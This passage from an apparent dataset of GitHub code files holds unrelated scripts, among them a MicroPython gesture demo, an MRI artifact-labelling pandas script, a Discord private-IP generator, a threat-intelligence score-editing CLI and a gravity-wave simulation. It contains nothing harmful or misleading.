APDS_9960 # Gesture control driver\nimport utime\n\n# Buffer for interrupt error messages\nmicropython.alloc_emergency_exception_buf(100)\n\n############################################################\n# Application Constants\n############################################################\n\n############################################################\n# Application Variables\n############################################################\n# Setup the MCU and application code to starting conditions\n# The blue LED will start on, the yellow LED will be off\ndef System_Init():\n print(\"Initializing system ...\")\n print(\"Starting application ...\")\n\n############################################################\n#\n# Start script execution ...\n#\n############################################################\n# Initialize the system\nSystem_Init()\n\n# Create a uart object, uart4, and setup the serial parameters\ni2c = I2C(1) # create on bus 1\ni2c = I2C(1, I2C.MASTER) # create and init as a master\ni2c.init(I2C.MASTER, baudrate=400000) # init as a master\n\n# Initialize the pins that will be used for LED control\nLED_Forward = pyb.Pin('PD14', pyb.Pin.OUT_PP)\nLED_Backward = 
pyb.Pin('PB0', pyb.Pin.OUT_PP)\nLED_Left = pyb.Pin('PB4', pyb.Pin.OUT_PP)\nLED_Right = pyb.Pin('PA3', pyb.Pin.OUT_PP)\n\n# Set the LED's initial state to off\nLED_Forward.value(1)\nLED_Backward.value(1)\nLED_Left.value(1)\nLED_Right.value(1)\n\n# Initialize the gesture driver and disable debug messages\nGesture = APDS_9960(i2c, False)\n\nGestureDetected = False\nGestureDetectedTime = utime.ticks_ms()\n\n# Main application loop\nwhile True:\n\n Result = Gesture.Detect()\n\n # Determine if there has been a validated gesture, if so tell us!\n if Result == APDS_9960.GESTURE_LEFT:\n GestureDetected = True\n GestureDetectedTime = utime.ticks_ms()\n LED_Left.low()\n print(\"Gesture Left!\")\n elif Result == APDS_9960.GESTURE_RIGHT:\n GestureDetected = True\n GestureDetectedTime = utime.ticks_ms()\n LED_Right.low()\n print(\"Gesture Right!\")\n elif Result == APDS_9960.GESTURE_FORWARD:\n GestureDetected = True\n GestureDetectedTime = utime.ticks_ms()\n LED_Forward.low()\n print(\"Gesture Forward!\")\n elif Result == APDS_9960.GESTURE_BACKWARD:\n GestureDetected = True\n GestureDetectedTime = utime.ticks_ms()\n LED_Backward.low()\n print(\"Gesture Backward!\") \n\n if GestureDetected is True:\n if (utime.ticks_ms() - GestureDetectedTime) > 5000:\n GestureDetected = False\n LED_Backward.high()\n LED_Forward.high()\n LED_Right.high()\n LED_Left.high()","repo_name":"PacktPublishing/MicroPython-Projects","sub_path":"Chapter07/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"31"} +{"seq_id":"37733679772","text":"import pandas as pd\nimport os,sys\n\n\n\npaths_dir = '/home/rpizarro/noise/XValidFns'\n\nfn = os.path.join(paths_dir,'filtered_failed_scanpaths_20201021.csv')\ndf = pd.read_csv(fn,index_col=0)\ncols = list(df)\n# drop Unanmed last four columns\ncols = cols[:-4]\ndf = df[cols]\nprint(list(df))\n# Drop NA from dataframe\ndf.dropna(subset=['ScanPath'],inplace=True)\n\nfn = os.path.join(paths_dir,'multiple_artifact','noise_scans.tj.csv')\nnoise = pd.read_csv(fn,index_col=0)\ncols_art = ['intensity', 'motion', 'coverage']\nnoise['max_val'] = noise.max(axis=1)\nnoise[cols_art] = noise[cols_art].div(noise.max_val, axis=0).round(1)\nnoise.drop(['max_val'],axis=1,inplace=True)\nprint(noise)\nprint(list(noise))\n\nfn = os.path.join(paths_dir,'multiple_artifact','trials_used_noise.tj.csv')\ntrials_used = pd.read_csv(fn,index_col=0)\nprint(trials_used.sum())\n# Only artifact that is properly identified\nkeywords = ['motion']\n# keywords = ['motion','intensity','artifScanPathact','coverage']\n\nfor k in keywords:\n df_k = df[df['Comments'].str.contains(k)]\n df_p = df_k[df_k['ScanPath'].str.contains('mnc.gz')]\n df_p = df_p.drop_duplicates(subset=['ScanPath'])\n print('Using keyword >>>{}<<< results in nb_files : {}'.format(k,df_p.shape[0]))\n # count = df_p[['Trial','Comments']].groupby(['Trial']).agg(['count'])\n count = df_p[['Trial','Comments']].groupby(['Trial']).count()\n for p in df_p['ScanPath'].drop_duplicates():\n p_actual = os.path.join('/data/datasets/FAILEDSCANS',p[1:])\n # print(p_actual)\n if not os.path.exists(p_actual):\n print('We could not find : {}'.format(p_actual))\n elif any(noise['path'].astype(str).str.contains(p_actual)):\n print('\\nWe already added : {}\\n'.format(p_actual))\n print(noise['path'].astype(str).str.contains(p_actual))\n else:\n print('We will append as movement : {}'.format(p_actual))\n row = pd.DataFrame([[0.0,0.0,1.0,0.0,p_actual]], columns = 
list(noise))\n noise = noise.append(row,ignore_index=True)\n # print(df_p[['Path','ScanPath']])\n # print(df_k['Comments'])\n\n\nsys.exit()\n\nprint(noise)\nfn = os.path.join(paths_dir,'multiple_artifact','noise_scans.tj.new_trials.csv')\nprint('Saving noise to : {}'.format(fn))\nnoise.to_csv(fn)\n\ncount = count.rename(columns={\"Comments\": \"noise\"})\n\nprint(list(count))\ncount = count.reset_index()\ncount.index = count.index.rename('index')\ncount.rename(columns={'Trial':'trial'},inplace=True)\nprint(count)\nfn_count = os.path.join(paths_dir,'motion_count_by_trial.csv')\nprint('Saving count to : {}'.format(fn_count))\n# count.to_csv(fn_count)\n\nprint(trials_used)\n# print(count[['trial','noise']])\n\ntrials_used = trials_used.append(count[['trial','noise']],ignore_index=True)\n\ntrials_used.sort_values(by=['trial'],inplace=True)\ntrials_used = trials_used.reset_index(drop=True)\n\nprint(trials_used)\nfn = os.path.join(paths_dir,'multiple_artifact','trials_used_noise.tj.new_trials.csv')\nprint('Saving noise to : {}'.format(fn))\ntrials_used.to_csv(fn)\n\n\n\n\n\n","repo_name":"AS-Lab/Pizarro-et-al-2023-DL-detects-MRI-artifacts","sub_path":"research/exp/noise.new_scans_artifacts.py","file_name":"noise.new_scans_artifacts.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"39239340109","text":"def mis(x,N):\n Dic = \"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n a = int(x)\n b = x - a\n result1 = []\n result2 = []\n result = \"\"\n while a != 0:\n result1.append(Dic[a%N])\n a //= N\n for i in range(16):\n if b==0:\n break\n result2.append(Dic[int(b*N)])\n b = b*N-int(b*N)\n if len(result1) == 0:\n result += '0'\n else:\n for i in range(len(result1)):\n result += result1.pop()\n if len(result2) != 0:\n result += '.' 
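# --- Editor's aside (illustration only, not part of the dataset records around it) ---
# The mis() routine in the surrounding record converts a float to base N by repeated
# division for the integer part and repeated multiplication for at most 16 fractional
# digits. A self-contained sketch of the integer half, cross-checked against Python's
# built-in int(s, base) parser:
DIGITS = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
def int_to_base(n, base):
    if n == 0:
        return "0"
    out = []
    while n:
        n, rem = divmod(n, base)
        out.append(DIGITS[rem])
    return "".join(reversed(out))
assert int_to_base(255, 16) == "FF"
assert all(int(int_to_base(n, b), b) == n for n in (0, 7, 1041) for b in (2, 8, 16, 36))
# --- end aside ---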
\n for i in range(len(result2)):\n result += result2.pop(0)\n return result\nwhile True:\n a=float(input(\"输入:\\n\"))\n b=int(input())\n print(\"输出\")\n print(mis(a,b))","repo_name":"mhq1065/respose","sub_path":"homework_7_py/9.2.1.py","file_name":"9.2.1.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31003383077","text":"import redis\nr = redis.Redis(host=\"localhost\",port=6379)\nif __name__ == '__main__':\n r.set(\"fruit\",\"苹果\") #设置字符串\n data = r.get(\"fruit\")\n print(data.decode()) #从Redis中获取的数据,要进行解码\n r.hmset(\"student:101\",{\"name\":\"马云\",\"age\":29,\"score\":93.5})\n data1 = r.hgetall(\"student:101\")\n resultData = {}\n for k,v in data1.items():\n resultData[k.decode()] = v.decode()\n print(resultData)","repo_name":"SpCrazy/crazy","sub_path":"code/Day5redis/RedisDemo/redisDemo.py","file_name":"redisDemo.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9790368568","text":"from discord.ext import commands\n\nfrom secrets import randbits\nfrom more_itertools import sliced\nfrom itertools import cycle\n\n\nclass Ip(commands.Cog):\n \"\"\"Command that returns random private IPv6/IPv4 addresses.\"\"\"\n\n ip4_func = (\n lambda: randbits(24) | 10 << 24,\n lambda: randbits(20) | 172 << 24 | 16 << 16,\n lambda: randbits(16) | 192 << 24 | 168 << 16,\n )\n ip6_func = (lambda: randbits(120) | 0xFD << 120,)\n\n @classmethod\n def to_ipv6(cls, ip_bits):\n return \":\".join(sliced(hex(ip_bits)[2:], 4))\n\n @classmethod\n def to_ipv4(cls, ip_bits):\n return \".\".join(str(0xFF & ip_bits >> i) for i in range(24, -1, -8))\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def ip(self, ctx, count: int = 1):\n count = max(1, count)\n ip = cycle(self.ip6_func)\n await ctx.send(\n \"\\n\".join(map(self.to_ipv6, sorted(next(ip)() for _ in range(count))))\n )\n\n @commands.command()\n async def ip4(self, ctx, count: int = 1):\n count = max(1, count)\n ip = cycle(self.ip4_func)\n await ctx.send(\n \"\\n\".join(map(self.to_ipv4, sorted(next(ip)() for _ in range(count))))\n )\n","repo_name":"Magma5/sysbot-helper-bot","sub_path":"src/sysbot_helper/cogs/ip.py","file_name":"ip.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"29502640321","text":"import sys\nimport json\nfrom collections import OrderedDict\nfrom datalake import ThreatType, OverrideType\nfrom datalake import Datalake\nfrom datalake.common.logger import logger\nfrom datalake_scripts.common.base_script import BaseScripts\nfrom datalake_scripts.helper_scripts.utils import (\n save_output,\n parse_threat_types,\n split_list,\n flatten_list,\n)\n\n\ndef main(override_args=None):\n \"\"\"Method to start the script\"\"\"\n # Load initial args\n parser = BaseScripts.start(\"Edit scores of a specified list of ids (hashkeys)\")\n parser.add_argument(\n \"hashkeys\",\n help=\"hashkeys of the threat to edit score.\",\n nargs=\"*\",\n )\n parser.add_argument(\n \"-i\",\n \"--input_file\",\n help=\"hashkey txt file, with one hashkey by line.\",\n )\n parser.add_argument(\n \"-t\",\n \"--threat_types\",\n nargs=\"+\",\n help=\"choose specific threat types and their score, like: ddos 50 scam 15\",\n default=[],\n action=\"append\",\n )\n parser.add_argument(\n \"-w\",\n \"--whitelist\",\n help=\"Whitelist the input, 
equivalent to setting all threat types at 0.\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"--permanent\",\n help=\"\"\"Permanent: all values will override any values provided by both newer and\n older IOCs. Newer IOCs with override_type permanent can still override old permanent changes.\n temporary: all values should override any values provided by older IOCs,\n but not newer ones.\"\"\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"--lock\",\n help=\"sets override_type to lock. Scores won't be updated by the algorithm for three months. Default is \"\n \"temporary\",\n action=\"store_true\",\n )\n if override_args:\n args = parser.parse_args(override_args)\n else:\n args = parser.parse_args()\n logger.debug(f\"START: edit_score.py\")\n\n if not args.hashkeys and not args.input_file:\n parser.error(\"either a hashkey or an input_file is required\")\n\n if args.permanent and args.lock:\n parser.error(\"Only one override type is authorized\")\n\n if args.permanent:\n override_type = OverrideType.PERMANENT\n elif args.lock:\n override_type = OverrideType.LOCK\n else:\n override_type = OverrideType.TEMPORARY\n\n if args.whitelist:\n parsed_threat_type = get_whitelist_threat_types()\n else:\n args.threat_types = flatten_list(args.threat_types)\n if not args.threat_types or len(args.threat_types) % 2 != 0:\n parser.error(\"threat_types invalid ! should be like: ddos 50 scam 15\")\n parsed_threat_type = parse_threat_types(args.threat_types)\n # removing duplicates while preserving order\n hashkeys = args.hashkeys\n if args.input_file:\n retrieve_hashkeys_from_file(args.input_file, hashkeys)\n if not hashkeys:\n raise parser.error(\"No hashkey found in the input file.\")\n hashkeys_chunks = list(\n split_list(list(OrderedDict.fromkeys(hashkeys)) if hashkeys else [], 100)\n )\n\n dtl = Datalake(env=args.env, log_level=args.loglevel)\n response_list = []\n for index, hashkeys in enumerate(hashkeys_chunks):\n try:\n dtl.Threats.edit_score_by_hashkeys(\n hashkeys, parsed_threat_type, override_type\n )\n except ValueError as e:\n logger.warning(\n f\"\\x1b[6;30;41mBATCH {str(index+1)}/{len(list(hashkeys_chunks))}: FAILED\\x1b[0m\"\n )\n for hashkey in hashkeys:\n response_list.append(hashkey + \": FAILED\")\n logger.warning(f\"\\x1b[6;30;41m{hashkey} : FAILED\\x1b[0m\")\n logger.warning(e)\n else:\n logger.info(\n f\"\\x1b[6;30;42mBATCH {str(index+1)}/{len(list(hashkeys_chunks))}: OK\\x1b[0m\"\n )\n for hashkey in hashkeys:\n response_list.append(hashkey + \": OK\")\n\n if args.output:\n save_output(args.output, response_list)\n logger.info(f\"Results saved in {args.output}\\n\")\n logger.debug(f\"END: edit_score.py\")\n\n\ndef get_whitelist_threat_types():\n return [{\"threat_type\": threat_type, \"score\": 0} for threat_type in ThreatType]\n\n\ndef retrieve_hashkeys_from_file(input_file, hashkeys):\n with open(input_file, \"r\", encoding=\"utf-8\") as input_file:\n for line in input_file:\n line = line.strip()\n if line:\n hashkeys.append(line)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"cert-orangecyberdefense/datalake","sub_path":"datalake_scripts/scripts/edit_score.py","file_name":"edit_score.py","file_ext":"py","file_size_in_byte":4582,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"31"} +{"seq_id":"784049513","text":"\"\"\"\nOnline logging script to be run concurrently with make train.\n\"\"\"\nimport functools\nimport itertools\nimport math\nimport matplotlib.pyplot as plt\nimport 
matplotlib.animation as animation\nimport sys\n\nimport random\n\nFILE_PATH = \"log.csv\"\n\nclass Plotter:\n def __init__(self, x1, y1, x2, y2, x3, y3, getter):\n self._fig = plt.figure()\n self._ax1 = self._fig.add_subplot(3, 1, 1)\n self._ax2 = self._fig.add_subplot(3, 1, 2)\n self._ax3 = self._fig.add_subplot(3, 1, 3)\n\n self._data_y1 = y1\n self._data_x1 = x1\n self._data_y2 = y2\n self._data_x2 = x2\n self._data_y3 = y3\n self._data_x3 = x3\n\n self._data_getter = getter\n\n def animate(self):\n ani = animation.FuncAnimation(self._fig, self._draw, interval=1)\n plt.tight_layout()\n plt.show()\n\n def _update_data(self):\n new_y1, new_y2, new_y3 = self._data_getter.get()\n self._data_y1.extend(new_y1)\n self._data_y2.extend(new_y2)\n self._data_y3.extend(new_y3)\n return new_y1, new_y2, new_y3\n\n def _draw(self, frame):\n new_y1s, new_y2s, new_y3s = self._update_data()\n\n if new_y1s:\n new_x1s = range(len(self._data_x1), len(self._data_x1) + len(new_y1s))\n new_x2s = range(len(self._data_x2), len(self._data_x2) + len(new_y2s))\n new_x3s = range(len(self._data_x3), len(self._data_x3) + len(new_y3s))\n self._data_x1.extend(new_x1s)\n self._data_x2.extend(new_x2s)\n self._data_x3.extend(new_x3s)\n\n linewidth = max(0.005, min(1.0, 10 / math.log(len(self._data_x1))))\n self._ax1.clear()\n self._ax1.plot(self._data_x1, self._data_y1, linewidth=linewidth)\n self._ax1.set_title(\"Loss\")\n self._ax2.clear()\n self._ax2.plot(self._data_x2, self._data_y2, linewidth=linewidth)\n self._ax2.set_title(\"Accuracy\")\n self._ax3.clear()\n self._ax3.plot(self._data_x3, self._data_y3, linewidth=linewidth)\n self._ax3.set_title(\"F1Score\")\n\nclass Getter:\n \"\"\"\n Class that provides a 'get' function for retrieving one data point at a time.\n \"\"\"\n def __init__(self, fpath):\n \"\"\"\n :param fpath: The path to the file to read from.\n :param dataindex: A parameter that indicates which index in the tuple of data items on a line to get.\n \"\"\"\n self.fpath = fpath\n self.epoch_num = 0\n\n def get(self):\n epoch_str = lambda epnum : \"----- \" + str(epnum) + \" -----\"\n with open(self.fpath) as f:\n # Take only the lines after the most recent epoch\n lines = [line.strip() for line in itertools.dropwhile(lambda x: x.strip() != epoch_str(self.epoch_num), f)]\n lines = [line.strip() for line in itertools.takewhile(lambda x: x.strip() != epoch_str(self.epoch_num + 1), lines)]\n lines = [line for line in lines if line.strip() != \"\" and not line.startswith('-')]\n tups = [line.split(',') for line in lines]\n data_x1 = [float(tup[0].strip()) for tup in tups]\n data_x2 = [float(tup[1].strip()) for tup in tups]\n data_x3 = [float(tup[2].strip()) for tup in tups]\n if data_x1:\n self.epoch_num += 1\n return data_x1, data_x2, data_x3\n\nif __name__ == \"__main__\":\n acc = 0\n loss = 1\n g = Getter(FILE_PATH)\n plotter = Plotter([0, 1], [0, 1], [0, 1], [0, 1], [0, 1], [0, 1], g)\n plotter.animate()\n\n","repo_name":"MaxStrange/ArtieInfant","sub_path":"scratch/cnn/src/visualization/visualizetraining.py","file_name":"visualizetraining.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40847879411","text":"import sys\n\nY, X, N = map(int, sys.stdin.readline().strip().split())\n\nboard = [list(sys.stdin.readline().strip())\n for _ in range(Y)]\n\nfor y in range(Y):\n for x in range(X):\n if board[y][x] == 'O':\n board[y][x] = 0\n\ntime_now = 1\n\n\nwhile True:\n if time_now == N:\n break\n \n time_now 
+= 1\n \n # 폭탄 설치부\n for y in range(Y):\n for x in range(X):\n if board[y][x] == '.':\n board[y][x] = time_now\n \n if time_now == N:\n break\n\n # 폭탄 폴발부\n time_now += 1\n tmp = []\n for y in range(Y):\n for x in range(X):\n if board[y][x] + 3 == time_now:\n for dy, dx in [(0,0), (1,0),(-1,0),(0,1),(0,-1)]:\n if 0<=y+dyki and j<10-ki and i>ki and i<10-ki:\n mask1[i, j] = 1 # int(np.sqrt(i**2+j**2))\n\n l.setByFourier(fft=fhat)\n forcage_curve = l.fft # 5*10**-4\n\n res = []\n name = \"sim_12\"\n description = \"local run\"\n\n time = 500 #1200 #*(10**0)\n dt = 10*10**-5\n\n startime=0\n starti = 0\n time_pass = 0\n time_rest = 0\n\n nt = int(time/dt)\n savet = int(1/dt)#int(nt*0.05) if nt>20 else 1 #int(.05/dt)\n plott = int(nt*0.1) if nt>10 else 1\n checkt = int(.01/dt) #int(nt*0.001) if nt>1000 else 1\n\n l0 = l\n eng = 0\n engz = 0\n\n try:\n with open('{}/lastprint.txt'.format(path)) as f:\n read_data = f.read()\n gversion = int(read_data.split('\\n')[0])\n _print(\"gversion was {}\".format(gversion),debug_level=3,save=False)\n except:\n gversion = 0\n\n\n L = fun(nx,nx)\n a = fun(nx,nx)\n A = fun(nx,nx)\n b = fun(nx,nx)\n B = fun(nx,nx)\n g = fun(nx,nx)\n G = fun(nx,nx)\n\n nua = 0 #.000001\n nub = 0 #.000001\n nug = 0 #.000001\n nul = 0 # 5*10**-7\n\n res0 = (0,l.d.copy(),L.d.copy(),0)\n hatmodule0 = hatmodule(res0[1],res0[2],l.dx)\n\n # line23 = (np.linspace(1,l.dimx,l.dimx)[:int(l.dimx/3)])**(-2/3)\n # q = np.argmax(hatmodule0)\n # line23 =line23/line23[q]*hatmodule0[q]\n\n forcage = None\n forcage_coef = 10**-5 #10**-5\n forcage_sign = 0\n forcage_signi = 0\n\n if not os.path.exists(\"{}/{}/\".format(datadir,name)):\n _print('created',save=False)\n os.chdir(datadir)\n os.mkdir(name)\n os.chdir('..')\n truei = 0\n for i in range(len(os.listdir(\"{}/{}/\".format(datadir,name)))):\n _print('{}/{}/{}_{}.npy'.format(datadir,name,name,i),save=False)\n if os.path.isfile('{}/{}/{}_{}.npy'.format(datadir,name,name,i)):\n truei = i #break\n _print(truei,save=False)\n\n truei -= 1\n if truei>1 and 1:\n try:\n res0 = (np.load('{}/{}/{}_{}.npy'.format(datadir,name,name,truei)))\n startime = res0[0]\n starti = int(startime/dt)\n l.upd(res0[1])\n L.upd(res0[2])\n forcage = res0[4]\n forcage_coef = res0[5]\n _print(\"will start calculation from t={} (i={})\".format(res0[0],truei),save=False, debug_level=3)\n except Exception as e:\n _print(e)\n else:\n _print(\"start new calculation\",save=False)\n gversion+=1\n\n _print(\"Version now is {}\".format(gversion), save=False)\n\n f = open(\"{}/lastinfo.txt\".format(path), \"w\")\n f.write(\"{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\".format(gversion, name, description, nx, int(nt / savet), nt, savet, dt, l.dx, ki, nul))\n f.close()\n\n #--------------------------------------------------------------------------------------------------------------------------------------------------\n\n\n sdif = stackdif(25)\n\n _print(\"time={:.3f}; nt={:.0f}; savet = {:.4f}; plott = {:.4f}; checkt= {:.4f}\".format(nt * dt, nt, savet * dt,\n plott * dt, checkt * dt), debug_level=3)\n # res.append((0,l.d.copy(),L.d.copy(),0))\n start = datetime.datetime.now()\n\n Lold = None\n\n for it in range(starti, nt):\n # 1) l'=L\n lf = ((3./ 2.*L.d - 1./2.*L.do)*dt +l.d)\n\n # 2) dxy(g) = -2(dx l)(dy l)\n gf = l.derx() * l.dery()\n gf, gfft = calculateDer(gf, g.dimx, g.dx, direc='x', n=-1, retfft=True)\n gf = -2*calculateDer(gf, g.dimy, g.dy, direc='y', n=-1, fft=gfft)\n\n # 3) g'=G + nug*(l,xx+l,yy)\n\n Gf = (2. 
* ((gf - g.d) / dt) + G.d) / 3\n #- nug * (calculateDer(gf, g.dimx, g.dx, direc='x', n=2, fft=gfft) + calculateDer(gf, g.dimy, g.dy, direc='y', n=2, fft=gfft)) / 2. +\n # - nug * (g.derx(n=2) + g.dery(n=2))/ 2.)\n\n # 4) L' = ...\n\n Lnew = (calculateDer((1 + a.d - b.d + g.d) * l.derx(), l.dimx, l.dx, direc='x', n=1) +\n calculateDer((1 - a.d + b.d + g.d) * l.dery(), g.dimy, l.dy, direc='y', n=1) -\n (A.d + B.d - G.d) * L.d) * ((1 - (a.d + b.d - g.d))) # ((a.d+b.d-g.d)**2))**(1)\n\n if type(Lold) == type(None): Lold = Lnew\n Lf = (3 * Lnew / 2 - Lold / 2) * dt + L.d + nul * (L.derx(n=2,mask=mask1) + L.dery(n=2,mask=mask1)) * dt\n Lold = Lnew\n\n # Lf = (3 * ((1 + a.d - b.d + g.d) * l.derx(n=2) + (1 - a.d + b.d + g.d) * l.dery(n=2) +\n # (a.derx() - b.derx() + g.derx()) * l.derx() + (-a.dery() + b.dery() + g.dery()) * l.dery()\n # - (A.d + B.d - G.d) * L.d) * ((1 - (a.d + b.d - g.d) + ((a.d + b.d - g.d) ** 2)) ** (1)) / 2 -\n # ((1 + a.do - b.do + g.do) * calculateDer(l.do, l.dimx, l.dx, direc='x', n=2) +\n # (1 - a.do + b.do + g.do) * calculateDer(l.do, l.dimy, l.dy, direc='y', n=2) +\n # (calculateDer(a.do, a.dimx, a.dx, direc='x', n=1) -\n # calculateDer(b.do, b.dimx, b.dx, direc='x', n=1) +\n # calculateDer(g.do, g.dimx, g.dx, direc='x', n=1)) * calculateDer(l.do, l.dimx, l.dx, direc='x', n=1) +\n # (-calculateDer(a.do, a.dimy, a.dy, direc='y', n=1) +\n # calculateDer(b.do, b.dimy, b.dy, direc='y', n=1) +\n # calculateDer(g.do, g.dimy, g.dy, direc='y', n=1)) * calculateDer(l.do, l.dimy, l.dy, direc='y', n=1) -\n # (A.do + B.do - G.do) * L.do) * ((1 - (a.do + b.do - g.do) + ((a.do + b.do - g.do) ** 2)) ** (1)) / 2\n # ) * dt + L.d + nul * (L.derx(n=2) + L.dery(n=2)) * dt\n\n # rnd = np.random.random(size=nx * nx).reshape((nx, nx))\n # forcage_curve = forcage_curve\n\n l.upd(lf)#, forcage=forcage, forcage_fft=forcage_curve, forcage_mode='add_fft')\n g.upd(gf)\n G.upd(Gf)\n\n # 5)\n Af = Lf * l.derx()\n Af = -2 * calculateDer(Af, l.dimx, l.dx, direc='x', n=-1)\n\n # 6)\n Bf = Lf * l.dery()\n Bf = -2 * calculateDer(Bf, l.dimy, l.dy, direc='y', n=-1)\n\n # 7)\n af = (3. * Af / 2 - A.d / 2.) * dt + a.d # + nua * (a.derx(n=2) + a.dery(n=2)))\n\n # 8)\n bf = (3. * Bf / 2 - B.d / 2.) 
* dt + b.d # + nub * (b.derx(n=2) + b.dery(n=2))) * dt\n\n # l.upd(lf)\n L.upd(Lf)\n a.upd(af)\n A.upd(Af)\n b.upd(bf)\n B.upd(Bf)\n\n if it % checkt == 0:\n eng1 = energy(l=l.d, L=L.d, dx=l.dx)\n sdif.push(eng1)\n if engz == 0:\n engz = eng1\n elif forcage != None:\n if sdif.full and sdif.dif() < -10 ** -6:\n # if forcage_sign!=1:\n # forcage_sign = 1\n forcage_signi += 1.\n if forcage_signi > 1.:\n forcage += forcage_coef\n if forcage_signi > 3.:\n forcage_signi = 0\n if forcage_sign != 1.:\n forcage_sign = 1.\n if forcage_coef > 10 ** -8: forcage_coef /= 2.\n\n if sdif.full and sdif.dif() > 10 ** -6:\n # if forcage_sign!=-1:\n # forcage_sign = -1\n forcage_signi -= 1.\n if forcage_signi < -1.:\n forcage -= forcage_coef\n if forcage_signi < -3.:\n forcage_signi = 0.\n if forcage_sign != -1.:\n forcage_sign = -1.\n if forcage_coef > 10 ** -8: forcage_coef /= 2.\n\n if (eng != 0 and (eng1 - eng) / eng1 > 2) or eng1 == np.nan or np.isnan(eng):\n # res.append((it*dt,l.d.copy(),L.d.copy()))\n out += (\"\\nconverge (energy goes form {:.4f} to {:.4f})\".format(eng / engz, eng1 / engz))\n _print(out,debug_level=4)\n break;\n engold = eng\n eng = eng1\n\n q = eng / engz\n\n # print(toplot2[0][0][int(it/checkt)], toplot2[0][1][int(it/checkt)])\n\n time_pass = (datetime.datetime.now() - start).total_seconds()\n time_rest = 0 if it-starti <= 0 else time_pass / (it-starti) * (nt - it)\n sign = \"+\" if forcage_sign > 0 else \"-\"\n\n try:\n forcage_true = 0 if forcage==None else forcage\n forcage_coef_true = 0 if forcage==None else forcage\n\n out = \"step {:.2f}M = simTime {:.2f}; forcage = {:.5f}m{}{:.5f}mm; \\nwith energy form {:.4f} to {:.4f} in {:.0f} steps; energyChange = {:.5f}m (<{:.2f}m>); \\ntime passed = {:.1f}min; time rest = {:.1f}min ({:.1f}h)\".format(\n it / (10 ** 6), it * dt, forcage_true * 10 ** 3, sign, forcage_coef_true * 10 ** 6, engold / engz, q,\n checkt, (eng1 - engold) / eng1 * 10 ** 6, sdif.dif() * 10 ** 6, time_pass/60, time_rest/60, time_rest/60/60)\n\n except Exception as e:\n out = (\"text:{}\".format(e))\n _print(out)\n #_print('@', debug_level=1,save=False, saveto=False)\n\n if it % savet == 0:\n if engz == 0: engz = eng1\n _print('---save--- {}/{}/{}_{}.npy'.format(datadir, name, name, int(it / savet)),save=False,debug_level=2)\n # res.append((it*dt,l.d.copy(),L.d.copy(),eng))\n res0 = (it * dt, l.d.copy(), L.d.copy(), eng, forcage, forcage_coef, l.dimx, sdif.dif(), a.d.copy(), A.d.copy(),\n b.d.copy(), B.d.copy(), g.d.copy(), G.d.copy())\n x = np.asarray(list(res0), dtype=object)\n np.save('{}/{}/{}_{}.npy'.format(datadir, name, name, int(it / savet)), x)\n with open('{}/runstatus.txt'.format(path)) as f:\n read_data = f.read()\n if int(read_data)==0:\n dif = (datetime.datetime.now() - start)\n out += (\"\\nEnd. 
total time {} ({:.3f}s)\".format(dif.__str__(), dif.total_seconds()))\n _print(out, debug_level=5)\n sys.exit(0)\n # time_pass = (datetime.datetime.now() - start).total_seconds()\n # time_rest = 0 if it==0 else time_pass/it*(nt-it)\n\n # txt.set_text(\"step {:.2f}mill = simTime {:.2f}; forcage = {:.5f}+-{:.5f}; energyChange = {:.5f} \\nwith energy form {:.4f} to {:.4f} in {:.0f} steps; \\ntime passed = {:.1f}min; time rest = {:.1f}min\".format(\n # it/(10**6),it*dt,forcage,forcage_coef,(eng1-engold)/eng1,engold/engz,eng/engz,savet,time_pass/60,time_rest/60))\n\n # print(\"step {:.2f}mill = simTime {:.3f}; with energy form {:.4f} to {:.4f} in {:.0f} steps; time passed = {:.1f}min; time rest = {:.1f}min\".format(\n # it/(10**6),it*dt,engold/engz,eng/engz,savet,time_pass/60,time_rest/60))\n # hatmodule1 = hatmodule(res[-1][1],res[-1][2],l.dx)\n\n\n # if not it % int(nt/100):\n # # Display Solution\n # # --------------------------------------\n # res.append((it*dt,sp))\n # print(\"{} = {}\".format(it,it*dt))\n dif = (datetime.datetime.now() - start)\n out += (\"\\nEnd. total time {} ({:.3f}s)\".format(dif.__str__(), dif.total_seconds()))\n _print(out, debug_level=5)\n","repo_name":"kyrylo-gr/gravity-wave-turbulence","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30463828259","text":"from django.conf import settings\nimport os\n\nfrom tweetme2.settings.local import BASE_DIR\n\n\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, \"my_static\")\n]\n\nSTATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR),\"static_local_cdn\",\"static_root\")\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR),\"static_local_cdn\",\"media_root\")\n\nSTATIC_DICT = {\n \"dir\":STATICFILES_DIRS,\n \"static_root\":STATIC_ROOT,\n \"media_url\":MEDIA_URL,\n \"media_root\":MEDIA_ROOT,\n}","repo_name":"cpatuserkc/demo_twitterclone","sub_path":"tweetme2/static_srv/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43309538591","text":"import 